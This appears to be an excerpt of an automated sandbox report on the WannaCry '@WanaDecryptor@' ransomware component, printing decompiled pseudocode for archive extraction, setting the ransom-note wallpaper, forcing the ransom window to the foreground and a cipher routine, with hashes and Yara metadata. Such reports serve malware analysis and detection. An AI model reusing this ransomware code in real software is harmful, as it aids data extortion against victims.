												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
													_t321 = _t321 + 2;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												L23:
												__eflags = _t157 - 0x5c;
												if(_t157 == 0x5c) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												__eflags = _t157 - 0x2f;
												if(_t157 == 0x2f) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t41 = _t157 + 4; // 0x4
													_t321 = _t41;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t42 = _t157 + 4; // 0x4
													_t321 = _t42;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("/../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t43 = _t157 + 4; // 0x4
													_t321 = _t43;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
													goto L23;
												}
												_push("/..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t44 = _t157 + 4; // 0x4
													_t321 = _t44;
													continue;
												}
												asm("repne scasb");
												_t338 = _t321 -  !0xffffffff;
												_t297 =  *(_t353 + 0x70);
												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
												_t354 = _t353 + 0xc;
												 *((char*)(_t354 + 0x13)) = 0;
												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
												_t355 = _t354 + 0xc;
												_t164 = _t162 >> 0x0000001e & 0x00000001;
												_t264 =  !(_t297 >> 0x17) & 0x00000001;
												_t340 =  *(_t355 + 0x3c) >> 8;
												__eflags = _t340;
												 *(_t355 + 0x12) = 0;
												_t234 = 1;
												if(_t340 == 0) {
													L39:
													_t264 = _t297 & 0x00000001;
													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
													_t164 = _t297 >> 0x00000004 & 0x00000001;
													_t299 = _t297 >> 0x00000005 & 0x00000001;
													__eflags = _t299;
													_t234 = _t299;
												} else {
													__eflags = _t340 - 7;
													if(_t340 == 7) {
														goto L39;
													} else {
														__eflags = _t340 - 0xb;
														if(_t340 == 0xb) {
															goto L39;
														} else {
															__eflags = _t340 - 0xe;
															if(_t340 == 0xe) {
																goto L39;
															}
														}
													}
												}
												_t341 = 0;
												__eflags = _t164;
												 *(_t346 + 0x108) = 0;
												if(_t164 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t234;
												if(_t234 != 0) {
													_t219 =  *(_t346 + 0x108) | 0x00000020;
													__eflags = _t219;
													 *(_t346 + 0x108) = _t219;
												}
												__eflags =  *(_t355 + 0x13);
												if( *(_t355 + 0x13) != 0) {
													_t217 =  *(_t346 + 0x108) | 0x00000002;
													__eflags = _t217;
													 *(_t346 + 0x108) = _t217;
												}
												__eflags = _t264;
												if(_t264 != 0) {
													_t215 =  *(_t346 + 0x108) | 0x00000001;
													__eflags = _t215;
													 *(_t346 + 0x108) = _t215;
												}
												__eflags =  *(_t355 + 0x12);
												if( *(_t355 + 0x12) != 0) {
													_t63 = _t346 + 0x108;
													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t63;
												}
												_t300 =  *((intOrPtr*)(_t355 + 0x58));
												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
												_t356 = _t355 + 8;
												 *(_t356 + 0x30) = _t177;
												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
												_t180 =  *(_t356 + 0x28);
												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
												 *(_t346 + 0x10c) = _t180;
												 *(_t346 + 0x114) = _t180;
												 *(_t346 + 0x11c) = _t180;
												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
													_t329 =  *(_t356 + 0x1c);
												} else {
													_t329 =  *(_t356 + 0x1c);
													 *((char*)(_t356 + 0x1a)) = 0;
													do {
														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
														_t273 = "UT";
														_t186 = _t356 + 0x18;
														while(1) {
															_t235 =  *_t186;
															_t303 = _t235;
															__eflags = _t235 -  *_t273;
															if(_t235 !=  *_t273) {
																break;
															}
															__eflags = _t303;
															if(_t303 == 0) {
																L57:
																_t186 = 0;
															} else {
																_t239 =  *((intOrPtr*)(_t186 + 1));
																_t311 = _t239;
																_t92 = _t273 + 1; // 0x2f000054
																__eflags = _t239 -  *_t92;
																if(_t239 !=  *_t92) {
																	break;
																} else {
																	_t186 = _t186 + 2;
																	_t273 = _t273 + 2;
																	__eflags = _t311;
																	if(_t311 != 0) {
																		continue;
																	} else {
																		goto L57;
																	}
																}
															}
															L59:
															__eflags = _t186;
															if(_t186 == 0) {
																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
																_t343 = _t341 + 5;
																_t276 = 1;
																__eflags = _t188 & 0x00000001;
																 *((char*)(_t356 + 0x12)) = 1;
																if((_t188 & 0x00000001) != 0) {
																	_t309 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t212 = E00411B50(_t309, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x11c) = _t212;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
																}
																__eflags = 1;
																if(1 != 0) {
																	_t307 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t204 = E00411B50(_t307, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x10c) = _t204;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
																}
																__eflags = _t276;
																if(_t276 != 0) {
																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
																}
															} else {
																goto L60;
															}
															goto L69;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L59;
														L60:
														_t341 = _t341 + 4;
														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
												}
												L69:
												__eflags = _t329;
												if(_t329 != 0) {
													_push(_t329);
													L00412C98();
													_t356 = _t356 + 4;
												}
												_t182 =  *((intOrPtr*)(_t356 + 0x20));
												memcpy(_t182 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
												__eflags = 0;
												return 0;
												goto L73;
											}
										} else {
											_push(_t313);
											L00412C98();
											return 0x800;
										}
									} else {
										return 0x800;
									}
								} else {
									return 0x700;
								}
							} else {
								goto L8;
							}
						} else {
							if(_t312 == _t232) {
								L8:
								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
								 *((char*)(_t226 + 4)) = 0;
								 *((intOrPtr*)(_t226 + 0x108)) = 0;
								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
								 *((intOrPtr*)(_t226 + 0x110)) = 0;
								 *((intOrPtr*)(_t226 + 0x114)) = 0;
								 *((intOrPtr*)(_t226 + 0x118)) = 0;
								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
								 *((intOrPtr*)(_t226 + 0x120)) = 0;
								 *((intOrPtr*)(_t226 + 0x124)) = 0;
								 *((intOrPtr*)(_t226 + 0x128)) = 0;
								__eflags = 0;
								return 0;
							} else {
								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
							}
						}
					}
				}
				L73:
			}





























































                                                      0x00411cf9
                                                      0x00411d00
                                                      0x00411d03
                                                      0x00411d07
                                                      0x00411d0b
                                                      0x00412233
                                                      0x0041223f
                                                      0x00411d11
                                                      0x00411d11
                                                      0x00411d16
                                                      0x00000000
                                                      0x00411d1c
                                                      0x00411d1f
                                                      0x00411d22
                                                      0x00411d27
                                                      0x00411d27
                                                      0x00411d30
                                                      0x00411d35
                                                      0x00411d5a
                                                      0x00411d5c
                                                      0x00411db5
                                                      0x00411db7
                                                      0x00411dba
                                                      0x00411dbd
                                                      0x00411dc2
                                                      0x00411dc2
                                                      0x00411dc5
                                                      0x00411dc7
                                                      0x00411dca
                                                      0x00411dcd
                                                      0x00411dd2
                                                      0x00411dd4
                                                      0x00411dd7
                                                      0x00411dd7
                                                      0x00411df9
                                                      0x00411e10
                                                      0x00411e15
                                                      0x00411e18
                                                      0x00411e1a
                                                      0x00411e39
                                                      0x00411e3e
                                                      0x00411e41
                                                      0x00411e43
                                                      0x00411e56
                                                      0x00411e5a
                                                      0x00411e5b
                                                      0x00411e62
                                                      0x00411e68
                                                      0x00411e73
                                                      0x00411e7c
                                                      0x00411e7f
                                                      0x00411e81
                                                      0x00411eae
                                                      0x00411eb7
                                                      0x00411eb9
                                                      0x00411ebd
                                                      0x00411ec9
                                                      0x00411ecd
                                                      0x00411ed4
                                                      0x00411ed4
                                                      0x00411ed7
                                                      0x00411ed7
                                                      0x00411ed9
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee6
                                                      0x00411ee6
                                                      0x00411ee9
                                                      0x00411eeb
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411ef0
                                                      0x00411ef0
                                                      0x00411ef2
                                                      0x00411ef4
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411ef7
                                                      0x00411ef9
                                                      0x00411efb
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411efe
                                                      0x00411f03
                                                      0x00411f04
                                                      0x00411f09
                                                      0x00411f0c
                                                      0x00411f0e
                                                      0x00411f10
                                                      0x00411f10
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411f15
                                                      0x00411f1a
                                                      0x00411f1b
                                                      0x00411f20
                                                      0x00411f23
                                                      0x00411f25
                                                      0x00411f27
                                                      0x00411f27
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411f2c
                                                      0x00411f31
                                                      0x00411f32
                                                      0x00411f37
                                                      0x00411f3a
                                                      0x00411f3c
                                                      0x00411f3e
                                                      0x00411f3e
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00411ee0
                                                      0x00411f43
                                                      0x00411f48
                                                      0x00411f49
                                                      0x00411f4e
                                                      0x00411f51
                                                      0x00411f53
                                                      0x00411f55
                                                      0x00411f55
                                                      0x00000000
                                                      0x00411f55
                                                      0x00411f5f
                                                      0x00411f6a
                                                      0x00411f6e
                                                      0x00411f75
                                                      0x00411f75
                                                      0x00411f7e
                                                      0x00411f83
                                                      0x00411f83
                                                      0x00411f93
                                                      0x00411f95
                                                      0x00411f98
                                                      0x00411f98
                                                      0x00411f9b
                                                      0x00411fa0
                                                      0x00411fa2
                                                      0x00411fb3
                                                      0x00411fbb
                                                      0x00411fbe
                                                      0x00411fc9
                                                      0x00411fd5
                                                      0x00411fd7
                                                      0x00411fd7
                                                      0x00411fda
                                                      0x00411fa4
                                                      0x00411fa4
                                                      0x00411fa7
                                                      0x00000000
                                                      0x00411fa9
                                                      0x00411fa9
                                                      0x00411fac
                                                      0x00000000
                                                      0x00411fae
                                                      0x00411fae
                                                      0x00411fb1
                                                      0x00000000
                                                      0x00000000
                                                      0x00411fb1
                                                      0x00411fac
                                                      0x00411fa7
                                                      0x00411fdc
                                                      0x00411fde
                                                      0x00411fe0
                                                      0x00411fe6
                                                      0x00411fe8
                                                      0x00411fe8
                                                      0x00411ff2
                                                      0x00411ff4
                                                      0x00411ffc
                                                      0x00411ffc
                                                      0x00411ffe
                                                      0x00411ffe
                                                      0x00412008
                                                      0x0041200a
                                                      0x00412012
                                                      0x00412012
                                                      0x00412014
                                                      0x00412014
                                                      0x0041201a
                                                      0x0041201c
                                                      0x00412024
                                                      0x00412024
                                                      0x00412026
                                                      0x00412026
                                                      0x00412035
                                                      0x00412037
                                                      0x00412039
                                                      0x00412039
                                                      0x00412039
                                                      0x00412039
                                                      0x00412043
                                                      0x00412047
                                                      0x00412058
                                                      0x0041205e
                                                      0x00412063
                                                      0x00412066
                                                      0x00412074
                                                      0x00412078
                                                      0x0041207e
                                                      0x00412082
                                                      0x00412086
                                                      0x0041208c
                                                      0x00412092
                                                      0x0041209c
                                                      0x0041209e
                                                      0x004120a4
                                                      0x004120aa
                                                      0x004120b0
                                                      0x004121f2
                                                      0x004120b6
                                                      0x004120b6
                                                      0x004120ba
                                                      0x004120bf
                                                      0x004120c6
                                                      0x004120ca
                                                      0x004120ce
                                                      0x004120d3
                                                      0x004120d7
                                                      0x004120d7
                                                      0x004120d9
                                                      0x004120db
                                                      0x004120dd
                                                      0x00000000
                                                      0x00000000
                                                      0x004120df
                                                      0x004120e1
                                                      0x004120f7
                                                      0x004120f7
                                                      0x004120e3
                                                      0x004120e3
                                                      0x004120e6
                                                      0x004120e8
                                                      0x004120e8
                                                      0x004120eb
                                                      0x00000000
                                                      0x004120ed
                                                      0x004120ed
                                                      0x004120f0
                                                      0x004120f3
                                                      0x004120f5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004120f5
                                                      0x004120eb
                                                      0x00412100
                                                      0x00412100
                                                      0x00412102
                                                      0x00412120
                                                      0x00412124
                                                      0x00412133
                                                      0x00412136
                                                      0x00412138
                                                      0x0041213c
                                                      0x00412150
                                                      0x00412153
                                                      0x0041215e
                                                      0x00412161
                                                      0x00412166
                                                      0x0041216a
                                                      0x00412170
                                                      0x00412173
                                                      0x00412173
                                                      0x00412179
                                                      0x0041217b
                                                      0x0041218f
                                                      0x00412192
                                                      0x0041219d
                                                      0x004121a0
                                                      0x004121a5
                                                      0x004121a9
                                                      0x004121af
                                                      0x004121b2
                                                      0x004121b2
                                                      0x004121b8
                                                      0x004121ba
                                                      0x004121e1
                                                      0x004121e7
                                                      0x004121ea
                                                      0x004121ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00412102
                                                      0x004120fb
                                                      0x004120fd
                                                      0x00000000
                                                      0x00412104
                                                      0x0041210e
                                                      0x00412115
                                                      0x00412115
                                                      0x00412119
                                                      0x004121f6
                                                      0x004121f6
                                                      0x004121f8
                                                      0x004121fa
                                                      0x004121fb
                                                      0x00412200
                                                      0x00412200
                                                      0x00412203
                                                      0x00412214
                                                      0x0041221f
                                                      0x00412225
                                                      0x0041222e
                                                      0x00000000
                                                      0x0041222e
                                                      0x00411e83
                                                      0x00411e83
                                                      0x00411e84
                                                      0x00411e9a
                                                      0x00411e9a
                                                      0x00411e47
                                                      0x00411e53
                                                      0x00411e53
                                                      0x00411e1e
                                                      0x00411e2a
                                                      0x00411e2a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411d37
                                                      0x00411d39
                                                      0x00411d5e
                                                      0x00411d66
                                                      0x00411d6d
                                                      0x00411d71
                                                      0x00411d74
                                                      0x00411d7a
                                                      0x00411d80
                                                      0x00411d86
                                                      0x00411d8c
                                                      0x00411d92
                                                      0x00411d98
                                                      0x00411d9e
                                                      0x00411da4
                                                      0x00411daa
                                                      0x00411db2
                                                      0x00411d3b
                                                      0x00411d57
                                                      0x00411d57
                                                      0x00411d39
                                                      0x00411d35
                                                      0x00411d16
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /../$/..\$\../$\..\
                                                      • API String ID: 0-3885502717
                                                      • Opcode ID: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
                                                      • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                                      • Opcode Fuzzy Hash: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
                                                      • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407E80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00407E80() {
				void _v518;
				short _v520;
				short _v540;
				void _v1038;
				char _v1040;
				long _v1060;
				void _v1558;
				short _v1560;
				long _v1580;
				int _t23;
				short _t39;
				void* _t42;
				void* _t54;
				void* _t55;

				_t39 =  *0x42179c; // 0x0
				_v1040 = _t39;
				memset( &_v1038, 0, 0x81 << 2);
				asm("stosw");
				_v1560 = _t39;
				memset( &_v1558, 0, 0x81 << 2);
				asm("stosw");
				_v520 = _t39;
				memset( &_v518, 0, 0x81 << 2);
				asm("stosw");
				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
				_t23 = wcslen( &_v1060);
				_t54 =  &_v1560 + 0x28;
				if(_t23 != 0) {
					_push(L"@WanaDecryptor@.bmp");
					swprintf( &_v1580, L"%s\\%s",  &_v1060);
					_t55 = _t54 + 0x10;
					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
					CopyFileW( &_v540, _t55, 0);
					return SystemParametersInfoW(0x14, 0, _t55, 1);
				} else {
					return _t23;
				}
			}

















                                                      0x00407e86
                                                      0x00407e9c
                                                      0x00407ea4
                                                      0x00407ea6
                                                      0x00407eb3
                                                      0x00407eb8
                                                      0x00407eba
                                                      0x00407eca
                                                      0x00407ed2
                                                      0x00407ed4
                                                      0x00407ee6
                                                      0x00407ef4
                                                      0x00407efa
                                                      0x00407f00
                                                      0x00407f10
                                                      0x00407f20
                                                      0x00407f26
                                                      0x00407f41
                                                      0x00407f56
                                                      0x00407f73
                                                      0x00407f08
                                                      0x00407f08
                                                      0x00407f08

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                                      • wcslen.MSVCRT ref: 00407EF4
                                                      • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
                                                      • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                                      • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                                      • API String ID: 13424474-2236924158
                                                      • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                                      • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004067F0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E004067F0(void* __ecx) {
				signed int _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				int _t16;
				int _t21;
				int _t22;
				int _t37;
				struct tagRECT* _t48;
				void* _t56;

				_t56 = __ecx;
				_t16 = IsIconic( *(__ecx + 0x20));
				if(_t16 == 0) {
					L00412CBC();
					return _t16;
				} else {
					_push(_t56);
					L00412DD0();
					asm("sbb eax, eax");
					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
					_t21 = GetSystemMetrics(0xb);
					_t22 = GetSystemMetrics(0xc);
					_t48 =  &_v104;
					GetClientRect( *(_t56 + 0x20), _t48);
					asm("cdq");
					asm("cdq");
					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
					L00412DB8();
					return _t37;
				}
			}















                                                      0x004067f4
                                                      0x004067fa
                                                      0x00406802
                                                      0x0040689c
                                                      0x004068a5
                                                      0x00406808
                                                      0x0040680a
                                                      0x0040680f
                                                      0x00406823
                                                      0x0040682b
                                                      0x00406839
                                                      0x0040683f
                                                      0x00406846
                                                      0x0040684c
                                                      0x00406866
                                                      0x00406879
                                                      0x00406884
                                                      0x0040688e
                                                      0x00406899
                                                      0x00406899

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                      • String ID:
                                                      • API String ID: 1397574227-0
                                                      • Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                                      • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                                      • Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                                      • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B3C0 Relevance: 12.2, APIs: 8, Instructions: 203COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 65%
                                                      			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
				void* _v4;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				struct HWND__* _v32;
				WCHAR* _v36;
				struct HWND__* _t90;
				signed int* _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t109;
				signed int _t113;
				signed int _t114;
				signed int _t121;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t143;
				signed int _t152;
				signed int _t157;
				void* _t185;
				void* _t188;
				signed int* _t191;
				void* _t204;
				signed int _t206;
				struct HWND__* _t207;
				void* _t211;
				void* _t212;
				void* _t217;
				void* _t218;
				signed int _t221;
				void* _t224;
				signed int* _t226;
				void* _t227;
				void* _t228;

				_t228 = _t227 - 0xc;
				_t124 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t206 = _a12;
				_t185 = 0;
				if(_t206 == 0) {
					L26:
					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
					_push(_t206);
					_t90 = FindWindowW(0, _v36); // executed
					_t207 = _t90;
					if(_t207 != 0) {
						_push(_t185);
						ShowWindow(_t207, 5);
						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
						SetForegroundWindow(_t207);
						SetFocus(_t207);
						SetActiveWindow(_t207);
						BringWindowToTop(_t207);
						_t90 = _v32;
						if(_t90 != 0) {
							ExitProcess(0);
						}
					}
					return _t90;
				} else {
					_t130 =  *(_t124 + 0x3cc);
					if(_t206 % _t130 != 0) {
						goto L26;
					} else {
						_t100 = _a16;
						if(_t100 != 1) {
							L13:
							_a16 = _t185;
							if(_t100 != 2) {
								L23:
								_t102 = _t206 / _t130;
								_t188 = _a4;
								_t221 = _a8;
								if(_t102 <= 0) {
									goto L11;
								} else {
									do {
										_push(_t221);
										_push(_t188);
										E0040B0C0(_t124);
										_t132 =  *(_t124 + 0x3cc);
										_t188 = _t188 + _t132;
										_t221 = _t221 + _t132;
										_a8 = _a8 + 1;
										_t105 = _t206 / _t132;
									} while (_a8 < _t105);
									return _t105;
								}
							} else {
								_t102 = _t206 / _t130;
								_t191 = _a8;
								_t224 = _a4;
								_a4 = _t191;
								if(_t102 <= 0) {
									goto L11;
								} else {
									while(1) {
										_t50 = _t124 + 0x3f0; // 0x444
										_push(_t191);
										E0040ADC0(_t124);
										_t109 = _t191;
										if( *((intOrPtr*)(_t124 + 4)) == 0) {
											break;
										}
										_t211 = 0;
										if( *(_t124 + 0x3cc) > 0) {
											do {
												 *_t109 =  *_t109 ^  *(_t211 + _t224);
												_t109 =  &(_t109[0]);
												_t211 = _t211 + 1;
											} while (_t211 <  *(_t124 + 0x3cc));
										}
										_t212 = _t224;
										_t56 = _t124 + 0x3f0; // 0x444
